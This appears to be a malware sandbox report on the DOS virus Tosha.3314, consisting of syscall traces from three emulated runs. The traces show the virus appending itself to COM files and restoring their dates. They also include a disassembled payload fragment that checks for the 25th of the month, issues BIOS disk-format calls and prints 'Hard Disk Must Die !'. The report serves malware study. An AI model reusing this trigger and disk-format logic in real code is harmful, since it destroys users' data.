Sample viewer

vx.netlux.org/Virus.DOS.Tosha.3314

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:08:58.406918855Z	26	PC: 13763 \| Set disk transfer address
2018-12-17T23:08:58.409001249Z	78	PC: 1376f \| Find first file
2018-12-17T23:08:58.414793912Z	47	PC: 137b1 \| Get disk transfer address
2018-12-17T23:08:58.415781184Z	67	PC: 137ba \| Get or set file attributes
2018-12-17T23:08:58.420928008Z	61	PC: 137c4 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T23:08:58.427255294Z	87	PC: 137ca \| Get or set file date and time
2018-12-17T23:08:58.42870818Z	63	PC: 137db \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:58.435563874Z	66	PC: 13816 \| Move file pointer
2018-12-17T23:08:58.437131299Z	64	PC: 1382b \| Write file or device (Write 3314 bytes on handle 5)
2018-12-17T23:08:58.451239849Z	66	PC: 13834 \| Move file pointer
2018-12-17T23:08:58.45284016Z	64	PC: 13851 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:58.459223564Z	87	PC: 137f3 \| Get or set file date and time
2018-12-17T23:08:58.460643406Z	62	PC: 137f7 \| Close file
2018-12-17T23:08:58.468581426Z	67	PC: 13806 \| Get or set file attributes
2018-12-17T23:08:58.478767714Z	79	PC: 1380a \| Find next file
2018-12-17T23:08:58.48363595Z	47	PC: 137b1 \| Get disk transfer address
2018-12-17T23:08:58.484679257Z	67	PC: 137ba \| Get or set file attributes
2018-12-17T23:08:58.495072156Z	61	PC: 137c4 \| Open file (Filename = 'PRINT.COM')
2018-12-17T23:08:58.501811495Z	87	PC: 137ca \| Get or set file date and time
2018-12-17T23:08:58.503806192Z	63	PC: 137db \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:58.51108579Z	66	PC: 13816 \| Move file pointer
2018-12-17T23:08:58.512822725Z	87	PC: 137f3 \| Get or set file date and time
2018-12-17T23:08:58.51432962Z	62	PC: 137f7 \| Close file
2018-12-17T23:08:58.521612842Z	67	PC: 13806 \| Get or set file attributes
2018-12-17T23:08:58.531795054Z	79	PC: 1380a \| Find next file
2018-12-17T23:08:58.534979332Z	47	PC: 137b1 \| Get disk transfer address
2018-12-17T23:08:58.538354018Z	67	PC: 137ba \| Get or set file attributes
2018-12-17T23:08:58.551763917Z	61	PC: 137c4 \| Open file (Filename = 'HELLO.COM')
2018-12-17T23:08:58.558433196Z	87	PC: 137ca \| Get or set file date and time
2018-12-17T23:08:58.560950945Z	63	PC: 137db \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:58.567376073Z	66	PC: 13816 \| Move file pointer
2018-12-17T23:08:58.569050787Z	87	PC: 137f3 \| Get or set file date and time
2018-12-17T23:08:58.570925974Z	62	PC: 137f7 \| Close file
2018-12-17T23:08:58.578109673Z	67	PC: 13806 \| Get or set file attributes
2018-12-17T23:08:58.588231232Z	79	PC: 1380a \| Find next file
2018-12-17T23:08:58.591380621Z	47	PC: 137b1 \| Get disk transfer address
2018-12-17T23:08:58.592658502Z	67	PC: 137ba \| Get or set file attributes
2018-12-17T23:08:58.602210043Z	61	PC: 137c4 \| Open file (Filename = 'PHANG.COM')
2018-12-17T23:08:58.61464936Z	87	PC: 137ca \| Get or set file date and time
2018-12-17T23:08:58.616245905Z	63	PC: 137db \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:58.622670299Z	66	PC: 13816 \| Move file pointer
2018-12-17T23:08:58.625020536Z	87	PC: 137f3 \| Get or set file date and time
2018-12-17T23:08:58.626390546Z	62	PC: 137f7 \| Close file
2018-12-17T23:08:58.633495086Z	67	PC: 13806 \| Get or set file attributes
2018-12-17T23:08:58.644437787Z	79	PC: 1380a \| Find next file
2018-12-17T23:08:58.647050409Z	47	PC: 137b1 \| Get disk transfer address
2018-12-17T23:08:58.648029895Z	67	PC: 137ba \| Get or set file attributes
2018-12-17T23:08:58.657655047Z	61	PC: 137c4 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:08:58.66406945Z	87	PC: 137ca \| Get or set file date and time
2018-12-17T23:08:58.665291474Z	63	PC: 137db \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:58.672938783Z	66	PC: 13816 \| Move file pointer
2018-12-17T23:08:58.679368923Z	87	PC: 137f3 \| Get or set file date and time
2018-12-17T23:08:58.680784897Z	62	PC: 137f7 \| Close file
2018-12-17T23:08:58.687614016Z	67	PC: 13806 \| Get or set file attributes
2018-12-17T23:08:58.697810045Z	79	PC: 1380a \| Find next file
2018-12-17T23:08:58.700285149Z	47	PC: 137b1 \| Get disk transfer address
2018-12-17T23:08:58.701264779Z	67	PC: 137ba \| Get or set file attributes
2018-12-17T23:08:58.713549209Z	61	PC: 137c4 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T23:08:58.720758659Z	87	PC: 137ca \| Get or set file date and time
2018-12-17T23:08:58.722300472Z	63	PC: 137db \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:58.727201278Z	66	PC: 13816 \| Move file pointer
2018-12-17T23:08:58.728403829Z	64	PC: 1382b \| Write file or device (Write 3314 bytes on handle 5)
2018-12-17T23:08:58.734114328Z	66	PC: 13834 \| Move file pointer
2018-12-17T23:08:58.736473504Z	64	PC: 13851 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:58.742788579Z	87	PC: 137f3 \| Get or set file date and time
2018-12-17T23:08:58.744130691Z	62	PC: 137f7 \| Close file
2018-12-17T23:08:58.752485768Z	67	PC: 13806 \| Get or set file attributes
2018-12-17T23:08:58.762259284Z	79	PC: 1380a \| Find next file
2018-12-17T23:08:58.765226405Z	47	PC: 137b1 \| Get disk transfer address
2018-12-17T23:08:58.766685936Z	67	PC: 137ba \| Get or set file attributes
2018-12-17T23:08:58.775958451Z	61	PC: 137c4 \| Open file (Filename = 'PAH.COM')
2018-12-17T23:08:58.782249552Z	87	PC: 137ca \| Get or set file date and time
2018-12-17T23:08:58.78407602Z	63	PC: 137db \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:58.790202414Z	66	PC: 13816 \| Move file pointer
2018-12-17T23:08:58.791534593Z	87	PC: 137f3 \| Get or set file date and time
2018-12-17T23:08:58.793995817Z	62	PC: 137f7 \| Close file
2018-12-17T23:08:58.801009747Z	67	PC: 13806 \| Get or set file attributes
2018-12-17T23:08:58.813148882Z	79	PC: 1380a \| Find next file
2018-12-17T23:08:58.816271137Z	42	PC: 13778 \| Get date 0x13778: cmp dl, 0x19 0x1377b: jne 0x137a2 0x1377d: mov ah, 5 0x1377f: mov dl, 2 0x13781: mov dh, 0 0x13783: mov ch, 0 0x13785: mov cl, 1 0x13787: mov al, 8 0x13789: int 0x13 0x1378b: mov ah, 5 0x1378d: mov dl, 0 0x1378f: mov dh, 0 0x13791: mov ch, 0 0x13793: mov cl, 1 0x13795: mov al, 8 0x13797: int 0x13 0x13799: mov ah, 9 0x1379b: mov dx, 0xcc6 0x1379e: add dx, bp 0x137a0: int 0x21
2018-12-17T23:08:58.818260411Z	26	PC: 137a9 \| Set disk transfer address
2018-12-17T23:08:58.81932521Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T23:08:58.823703617Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16375,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:52:37.219356876Z	26	PC: 13763 \| Set disk transfer address
2018-12-25T12:52:37.220990184Z	78	PC: 1376f \| Find first file
2018-12-25T12:52:37.226737461Z	47	PC: 137b1 \| Get disk transfer address
2018-12-25T12:52:37.227727973Z	67	PC: 137ba \| Get or set file attributes
2018-12-25T12:52:37.232540733Z	61	PC: 137c4 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:52:37.239937862Z	87	PC: 137ca \| Get or set file date and time
2018-12-25T12:52:37.241642171Z	63	PC: 137db \| Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:52:37.248110806Z	66	PC: 13816 \| Move file pointer
2018-12-25T12:52:37.250311984Z	64	PC: 1382b \| Write file or device (Write 3314 bytes on handle 5)
2018-12-25T12:52:37.266027535Z	66	PC: 13834 \| Move file pointer
2018-12-25T12:52:37.267751982Z	64	PC: 13851 \| Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:52:37.275333362Z	87	PC: 137f3 \| Get or set file date and time
2018-12-25T12:52:37.276798798Z	62	PC: 137f7 \| Close file
2018-12-25T12:52:37.284325774Z	67	PC: 13806 \| Get or set file attributes
2018-12-25T12:52:37.294756312Z	79	PC: 1380a \| Find next file
2018-12-25T12:52:37.297532175Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.298478731Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.309209057Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.315839774Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.317329182Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.331724095Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.333141624Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.334447482Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.341839396Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.351477025Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.354225899Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.356437854Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.365616819Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.376373722Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.379473845Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.385892389Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.387509439Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.390622657Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.397316841Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.406548095Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.409927399Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.410984598Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.420098086Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.427036735Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.428366204Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.434467934Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.436364679Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.437807501Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.447426563Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.462662667Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.465202757Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.466541459Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.476125449Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.482865469Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.484069103Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.490188031Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.492239587Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.493805551Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.501101615Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.514384935Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.516934376Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.518159293Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.528421327Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.535223043Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.53688152Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.543926886Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.545589565Z	64	PC: 1382b \| Write file or device (See above)
2018-12-25T12:52:37.562978691Z	66	PC: 13834 \| Move file pointer (See above)
2018-12-25T12:52:37.565062924Z	64	PC: 13851 \| Write file or device (See above)
2018-12-25T12:52:37.571563348Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.573002477Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.582625003Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.59216214Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.594613689Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.596468611Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.605838922Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.612150787Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.614491166Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.620795906Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.622110892Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.624030584Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.63084263Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.642785069Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.645783959Z	42	PC: 13778 \| Get date 0x13778: cmp dl, 0x19 0x1377b: jne 0x137a2 0x1377d: mov ah, 5 0x1377f: mov dl, 2 0x13781: mov dh, 0 0x13783: mov ch, 0 0x13785: mov cl, 1 0x13787: mov al, 8 0x13789: int 0x13 0x1378b: mov ah, 5 0x1378d: mov dl, 0 0x1378f: mov dh, 0 0x13791: mov ch, 0 0x13793: mov cl, 1 0x13795: mov al, 8 0x13797: int 0x13 0x13799: mov ah, 9 0x1379b: mov dx, 0xcc6 0x1379e: add dx, bp 0x137a0: int 0x21
2018-12-25T12:52:37.648321691Z	26	PC: 137a9 \| Set disk transfer address
2018-12-25T12:52:37.649390528Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:52:37.655676044Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":25,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16375,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:52:37.50976829Z	26	PC: 13763 \| Set disk transfer address
2018-12-25T12:52:37.511409309Z	78	PC: 1376f \| Find first file
2018-12-25T12:52:37.517105581Z	47	PC: 137b1 \| Get disk transfer address
2018-12-25T12:52:37.518021988Z	67	PC: 137ba \| Get or set file attributes
2018-12-25T12:52:37.522887404Z	61	PC: 137c4 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:52:37.534549675Z	87	PC: 137ca \| Get or set file date and time
2018-12-25T12:52:37.536039307Z	63	PC: 137db \| Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:52:37.542726481Z	66	PC: 13816 \| Move file pointer
2018-12-25T12:52:37.544927442Z	64	PC: 1382b \| Write file or device (Write 3314 bytes on handle 5)
2018-12-25T12:52:37.560012753Z	66	PC: 13834 \| Move file pointer
2018-12-25T12:52:37.562306185Z	64	PC: 13851 \| Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:52:37.568833264Z	87	PC: 137f3 \| Get or set file date and time
2018-12-25T12:52:37.570030958Z	62	PC: 137f7 \| Close file
2018-12-25T12:52:37.577183694Z	67	PC: 13806 \| Get or set file attributes
2018-12-25T12:52:37.587223598Z	79	PC: 1380a \| Find next file
2018-12-25T12:52:37.59014897Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.591778918Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.601524556Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.608402632Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.60998557Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.61687836Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.618123358Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.619642569Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.627636782Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.637263394Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.639704752Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.641330519Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.651370851Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.658019267Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.660266214Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.666416137Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.667685445Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.669941155Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.679738603Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.689221193Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.698189899Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.699138657Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.708471074Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.715116844Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.716338087Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.722765971Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.724471029Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.725829415Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.732849586Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.744985082Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.748144223Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.749322818Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.759860717Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.766508286Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.76805687Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.775336854Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.776820616Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.778427614Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.786275039Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.79589684Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.798622348Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.800023347Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.810393586Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.817379745Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.818630956Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.825094545Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.826455537Z	64	PC: 1382b \| Write file or device (See above)
2018-12-25T12:52:37.834978818Z	66	PC: 13834 \| Move file pointer (See above)
2018-12-25T12:52:37.837033276Z	64	PC: 13851 \| Write file or device (See above)
2018-12-25T12:52:37.843590518Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.845141801Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.854701053Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.864502429Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.867168959Z	47	PC: 137b1 \| Get disk transfer address (See above)
2018-12-25T12:52:37.869279749Z	67	PC: 137ba \| Get or set file attributes (See above)
2018-12-25T12:52:37.879322524Z	61	PC: 137c4 \| Open file (See above)
2018-12-25T12:52:37.885946374Z	87	PC: 137ca \| Get or set file date and time (See above)
2018-12-25T12:52:37.888444553Z	63	PC: 137db \| Read file or device (See above)
2018-12-25T12:52:37.894755443Z	66	PC: 13816 \| Move file pointer (See above)
2018-12-25T12:52:37.896624285Z	87	PC: 137f3 \| Get or set file date and time (See above)
2018-12-25T12:52:37.899459622Z	62	PC: 137f7 \| Close file (See above)
2018-12-25T12:52:37.906380167Z	67	PC: 13806 \| Get or set file attributes (See above)
2018-12-25T12:52:37.915972326Z	79	PC: 1380a \| Find next file (See above)
2018-12-25T12:52:37.919378705Z	42	PC: 13778 \| Get date 0x13778: cmp dl, 0x19 0x1377b: jne 0x137a2 0x1377d: mov ah, 5 0x1377f: mov dl, 2 0x13781: mov dh, 0 0x13783: mov ch, 0 0x13785: mov cl, 1 0x13787: mov al, 8 0x13789: int 0x13 0x1378b: mov ah, 5 0x1378d: mov dl, 0 0x1378f: mov dh, 0 0x13791: mov ch, 0 0x13793: mov cl, 1 0x13795: mov al, 8 0x13797: int 0x13 0x13799: mov ah, 9 0x1379b: mov dx, 0xcc6 0x1379e: add dx, bp 0x137a0: int 0x21
2018-12-25T12:52:37.92396747Z	9	PC: 137a2 \| Display string (String= 'Hard Disk Must Die !')
2018-12-25T12:52:37.926369034Z	26	PC: 137a9 \| Set disk transfer address
2018-12-25T12:52:37.928364254Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:52:37.93355206Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')